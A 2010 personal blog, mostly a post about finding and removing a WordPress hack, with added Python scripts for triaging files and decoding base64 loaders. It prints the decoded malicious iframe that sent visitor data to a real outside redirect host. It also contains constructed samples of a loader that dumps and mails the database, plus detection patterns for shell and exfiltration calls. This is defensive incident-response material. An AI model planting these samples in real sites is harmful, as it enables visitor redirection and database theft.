Dhivael/Anne’s Hyperactive Blog

Not just another WordPress weblog – it’s hyperactive!

Archive for February, 2010

Sporadic updates

Feb-17-2010 By annelions

I haven’t really been updating my blog at all recently. I just… haven’t felt very creative. Which I think is silly. Anyway, to combat this, I’ve downloaded and am playing with Writer’s Cafe.

Writer’s Cafe is a nifty little program that lets you storyboard and brainstorm. It also has a random name generator and a random plot idea generator. There’s an in-program journal as well. If you want to practice writing under a deadline, there’s a timer thing available too. All in all, the demo looks to be a nifty little program. The full one is about $60, but it looks to be a good deal for a serious writer.

I’ve been hacked! (But I fixed it)

Feb-11-2010 By annelions

(I think.)

I had reason to go searching for something in my blog this morning. In the process, I found out my blog had been hacked to redirect people away. Guess that’s what I get for not paying attention. I could’ve sworn that I’d upgraded… but apparently not.

Of course, I freaked.

Some digging around produced a helpful link or two or three regarding what to do.

After reading through the instructions, I prepared for hours’ worth of removing junk from my site. After downloading the entire blog as well as a backup of my SQL DB, I found… nothing. Well, almost nothing. The hack consisted of:

  1. 6 or 7 unauthorized users, one of whom was an admin.
  2. Some obfuscated Javascript in the header.php of my theme.
  3. A randomly named PHP file in my upload directory.

Things were, clearly, better than I thought. Despite the dire predictions of others, this was fairly simple to fix.

  1. Upgrade! I thought I had before; obviously not. But I upgraded now.
  2. Delete those unauthorized users.
  3. Delete the “845530.php” file in my upload directory.
  4. Delete the offending Javascript in my header.php file.
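
The three indicators above (PHP under the upload directory, an obfuscated loader, injected script in a theme file) are easy to check for mechanically on the downloaded copy of the site. The following triage script is an added example, not the blog's own tooling: it walks a WordPress tree and reports those indicators. The sample install it builds, its file names and the example.invalid host are constructed for the demo, and the regular expressions are my own heuristics rather than a complete rule set.

```python
"""Triage a downloaded WordPress tree for the indicators the post describes:
PHP files under wp-content/uploads, eval-over-decoder loaders, hidden 1x1
iframes, and long base64-looking blobs inside <script> tags.
Added example; the sample tree it builds is constructed, not a real site."""
import os
import re
import tempfile

# PHP loaders that hide their real body behind eval() of a decoder call.
PHP_LOADER_RE = re.compile(
    r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(",
    re.IGNORECASE,
)
# A 1x1 iframe is the classic drive-by redirect shape (as in the decoded payload).
HIDDEN_IFRAME_RE = re.compile(
    r"<iframe[^>]*(?:width\s*=\s*['\"]?1\b[^>]*height\s*=\s*['\"]?1\b|"
    r"height\s*=\s*['\"]?1\b[^>]*width\s*=\s*['\"]?1\b)",
    re.IGNORECASE,
)
# An unbroken run of 200+ base64-alphabet characters inside a <script> block is
# a cheap obfuscation tell (heuristic: minified or data-URI scripts also trip it).
SCRIPT_BLOB_RE = re.compile(
    r"<script[^>]*>.*?[A-Za-z0-9+/=]{200,}.*?</script>",
    re.IGNORECASE | re.DOTALL,
)


def triage_wordpress(root):
    """Walk a WordPress install; return a sorted list of (indicator, relative_path)."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            lower = name.lower()
            # Indicator 1: WordPress never writes code into uploads/, so any PHP there is foreign.
            if lower.endswith(".php") and rel.startswith("wp-content/uploads/"):
                findings.append(("php-in-uploads", rel))
            if not lower.endswith((".php", ".js", ".html")):
                continue
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue
            # Indicators 2 and 3: obfuscated loader / injected script in any code file.
            if PHP_LOADER_RE.search(text):
                findings.append(("eval-loader", rel))
            if HIDDEN_IFRAME_RE.search(text):
                findings.append(("hidden-iframe", rel))
            if SCRIPT_BLOB_RE.search(text):
                findings.append(("script-blob", rel))
    return sorted(findings)


def build_sample_tree():
    """Constructed sample install: one clean theme file plus the three indicators."""
    root = tempfile.mkdtemp(prefix="wp-triage-")
    files = {
        "wp-content/themes/demo/index.php": "<?php get_header(); ?>\n<p>hello</p>\n",
        "wp-content/themes/demo/header.php": (
            "<html><head>\n<script>" + "QUJD" * 60 + "</script>\n</head>\n"
            "<body><iframe src='http://example.invalid/in.cgi' width=1 height=1 "
            "frameborder=0></iframe>\n"
        ),
        # Hypothetical random name standing in for the dropped file.
        "wp-content/uploads/2010/02/123456.php": (
            "<?php eval(base64_decode('ZWNobyAnaGVsbG8nOw==')); ?>\n"
        ),
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for indicator, rel in triage_wordpress(build_sample_tree()):
        print(f"{indicator:14} {rel}")
```

Point it at the unpacked site rather than the live server, and treat each hit as something to read, not delete blindly: the literal iframe only appears after the injected script runs, which is why the script-blob check exists, and that check will also flag legitimate minified or inline-data scripts. Note that this covers only the file-system side; the unauthorized users live in the database and still have to be reviewed there.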

After doing this, I was left with an obfuscated PHP file and Javascript. So, of course, I decided to decrypt them.

The PHP file was easy. Two passes through base64_decode() produced readable code. The offending file is pretty long, so I’m not sure precisely what it does, but there are a few interesting points. There are a few lines that seem to allow the hacker to download and email themselves your SQL DB. This is, no doubt, why you’re advised to change your password after getting hacked. It also likely helps your server function as a “relay” station for the Javascript. As such, it’s absolutely necessary that you find and delete this ASAP.
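
The two-pass decode above generalizes: droppers of this kind nest base64 layers, sometimes with a fresh eval(base64_decode(...)) wrapper at each level, sometimes with a bare base64 string. The script below is an added example, not the author's method or the real file from this blog: it peels layers until readable PHP appears (stopping as soon as a layer is not valid base64, so it never over-decodes), then lists the calls in the result that are worth attention. The double-wrapped loader it decodes is constructed here to mimic the shape the post describes, the example.invalid address is a placeholder, and the watch-list of function names is my own.

```python
"""Peel nested base64 layers from an eval(base64_decode(...)) loader until
readable PHP appears, then flag the calls in it that matter for triage.
Added example; the loader decoded here is constructed, not a real sample."""
import base64
import binascii
import re

# Argument of a base64_decode('...') call; whitespace is tolerated because
# droppers often wrap the blob across lines.
B64_ARG_RE = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]*)['\"]\s*\)")
# Functions a decoded dropper typically uses to exfiltrate, shell out or touch the DB.
SUSPICIOUS_CALLS = ("mail", "mysql_connect", "mysql_query", "file_get_contents",
                    "fopen", "curl_exec", "system", "exec", "passthru", "shell_exec", "eval")
MAX_LAYERS = 10


def _decode_text(candidate):
    """Strictly base64-decode `candidate`; return the text, or None if it is not
    valid base64 or does not decode to printable UTF-8 (i.e. not another layer)."""
    try:
        raw = base64.b64decode(candidate, validate=True)
        text = raw.decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    if not text or not all(ch.isprintable() or ch in "\r\n\t" for ch in text):
        return None
    return text


def peel(source, max_layers=MAX_LAYERS):
    """Return (layers_peeled, final_text). Each round either takes the argument
    of a base64_decode() call in the current text, or treats the whole text as
    a bare base64 string; it stops when neither decodes to readable text."""
    layers = 0
    text = source
    while layers < max_layers:
        match = B64_ARG_RE.search(text)
        candidate = match.group(1) if match else text
        decoded = _decode_text(re.sub(r"\s+", "", candidate))
        if decoded is None:
            break
        text = decoded
        layers += 1
    return layers, text


def suspicious_calls(php):
    """Sorted list of watch-listed functions actually called in the decoded PHP."""
    return sorted(name for name in SUSPICIOUS_CALLS
                  if re.search(r"\b%s\s*\(" % name, php))


def build_sample_loader():
    """Constructed two-layer loader: eval(base64) wrapping eval(base64) wrapping
    a small PHP body that dumps and mails the database (placeholder address)."""
    inner = ("<?php\n"
             "$dump = shell_exec('mysqldump --all-databases');\n"
             "mail('drop@example.invalid', 'db', $dump);\n")
    layer1 = "eval(base64_decode('%s'));" % base64.b64encode(inner.encode()).decode()
    return "<?php eval(base64_decode('%s')); ?>" % base64.b64encode(layer1.encode()).decode()


if __name__ == "__main__":
    layers, php = peel(build_sample_loader())
    print("layers peeled:", layers)
    print(php)
    print("suspicious calls:", suspicious_calls(php))
```

Run it against the suspicious file's contents rather than pasting the blob into a web decoder: the payload may contain the attacker's address or a second-stage URL, and leaking it to a third-party site tells you nothing you cannot learn offline. The watch-list is a starting point; read the whole decoded file, since the mail and database calls are what justify rotating the database password after cleanup.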

The Javascript proved a bit trickier. It was encoded differently and it took me a while to figure out how to get it, and then only after help and a nudge in the right direction. It proved to be code that would write the following to your page:

<iframe src='http://itsallbreaksoft.net/tds/in.cgi?3&seoref=" encodeURIComponent(document.referrer) "&parameter=$keyword&se=$se&ur=1&HTTP_REFERER=" encodeURIComponent(document.URL) "&default_keyword=notdefine' width=1 height=1 border=0 frameborder=0></iframe>

After Googling for itsallbreaksoft.net, this turned out to be a known “bad site”.

Strangely enough, none of the sites mention the obfuscated PHP file, although I’m fairly certain it’s all part of the same exploit.